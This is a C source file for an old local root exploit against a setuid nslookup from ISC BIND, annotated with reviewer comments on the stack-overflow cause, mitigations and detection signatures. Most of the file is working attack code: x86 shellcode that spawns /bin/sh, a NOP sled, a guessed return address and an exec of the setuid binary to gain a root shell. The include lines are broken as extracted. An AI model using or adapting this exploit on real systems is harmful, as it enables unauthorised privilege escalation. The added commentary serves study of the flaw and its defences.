/*
 * nslookup.c exploit
 * lore
 *
 * wrote this one about a year ago, so it only works with old
 * versions of the ISC bind package.
 *
 * Note: nslookup has to be suid
 *
 * Reviewer notes (defensive reading of this historical proof of concept):
 *  - The whole program builds one oversized command-line argument and hands
 *    it to a setuid nslookup. The root cause it targets is a fixed-size
 *    stack buffer filled from argv without a length check (the "sscanf"
 *    remark below suggests a %s conversion with no field width — inferred,
 *    not shown here). The fix is a bounded read in the parser and, above
 *    all, not shipping a resolver client with the setuid bit.
 *  - The technique assumes a predictable stack address (get_esp() - OFFSET),
 *    an executable stack and a 32-bit x86 ABI. Stack canaries
 *    (-fstack-protector), non-executable stacks and ASLR are the standard
 *    mitigations that break this fixed-address NOP-sled layout.
 *  - Detection angle: a setuid binary exec'd with a ~260-byte argument made
 *    of 0x90 bytes followed by "/bin/sh" is a straightforward audit/EDR
 *    signature for exec events.
 */

/* NOTE(review): the header names were lost when this page was extracted;
 * the two bare #include directives below do not compile as they stand. */
#include #include

/* Must use shell code without '\0' like this, or sscanf will chop it in half */
/* Payload bytes: raw machine code followed by the string "/bin/sh" and dot
 * padding. The author's "no 0x00" constraint above is the tell that the
 * vulnerable input path was a NUL-terminated string copy. */
char hellcode[] =
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh.........";

#define BSIZE (256)                 /* presumably the target's buffer size — author's figure */
#define ESIZE ((BSIZE + 8))         /* total argument length; the extra 8 bytes look like saved-frame slots (inferred) */
#define PATH ("/usr/bin/nslookup")  /* the setuid binary being exec'd */
#define OFFSET (400)                /* default distance below get_esp() used as the address guess */
#define NOP (0x90)                  /* x86 nop; fills the sled */

/*
 * Leaves the current stack pointer in %eax and falls off the end without a
 * C return statement — undefined behaviour that only happens to work on
 * 32-bit x86 where %eax is the integer return register.
 */
long get_esp (void) { __asm__("movl %esp, %eax"); }

int main (int argc, char * * argv) {
    int offset, i, j;
    long addr;
    char * evil;

    evil = (char *)malloc(ESIZE);   /* allocation result is never checked */
    offset = OFFSET;

    /* Fill order: NOP sled, then hellcode, leaving the last 4 bytes for an
     * address. strlen() yields size_t, so the first bound is evaluated as
     * unsigned arithmetic against the signed int i. */
    for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
        evil[i] = NOP;
    for (j = 0; i < (ESIZE - 4); ++j, ++i)
        evil[i] = hellcode[j];

    /* Optional argv[1] overrides the offset guess; atoi reports no errors. */
    if (argc > 1)
        offset = atoi(argv[1]);

    addr = (get_esp() - offset);
    /* Assumes sizeof(long) == 4; on LP64 this writes 8 bytes past ESIZE - 4,
     * i.e. off the end of the allocation. */
    *(long *)(evil + i) = addr;

    fprintf(stderr, "nslookup exploit, lore\n");
    /* %x with a long argument is a format/type mismatch on 64-bit targets. */
    fprintf(stderr, "\nUsing address 0x%x, offset %d\n", addr, offset);
    fprintf(stderr, "You might go into a rootshell after you get unspecified error.\n\n");

    /* No terminator is written inside the ESIZE bytes, so execl reads the
     * argument string past the end of the allocation (heap over-read).
     * main also has no return statement. */
    execl(PATH, "nslookup", evil, NULL);
}